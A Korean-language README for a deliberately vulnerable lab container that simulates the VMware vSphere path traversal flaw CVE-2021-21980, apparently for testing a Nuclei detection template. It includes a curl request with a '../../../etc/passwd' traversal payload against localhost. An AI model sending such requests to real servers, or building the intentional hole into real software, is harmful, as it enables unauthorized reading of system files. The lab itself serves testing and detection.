
CVE-2021-21980 (VMware vSphere 경로 탐색)를 위한 실제 취약 실습 환경 - 모의 서버가 아닌 실제 파일 익스플로잇
VMware vSphere Web Client의 경로 탐색 취약점을 시뮬레이션하는 실제적인 테스트 환경입니다.
⚠️ 경고: 취약한 테스트 환경입니다. 인터넷에 노출하지 마세요!
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
✅ 실제로 파일을 읽습니다 - Python 파일 I/O를 사용하여 컨테이너 파일시스템에서
✅ 실제와 유사한 동작 - 실제 vSphere처럼 경로 탐색을 처리
✅ VMware 헤더 - Server: VMware-HTTP-Server/1.0 포함
✅ SSL/TLS - 자체 서명 인증서 생성
✅ 하드코딩되지 않음 - 실제 파일 내용 반환
Dockerfile - 컨테이너 빌드 구성server.py - 취약한 Flask 애플리케이션CVE-2021-21980.yaml - Nuclei 탐지 템플릿README.md - 이 파일이 랩은 Nuclei로 검증되었으며 다음을 보여줍니다:
podman stop vcenter-lab && podman rm vcenter-lab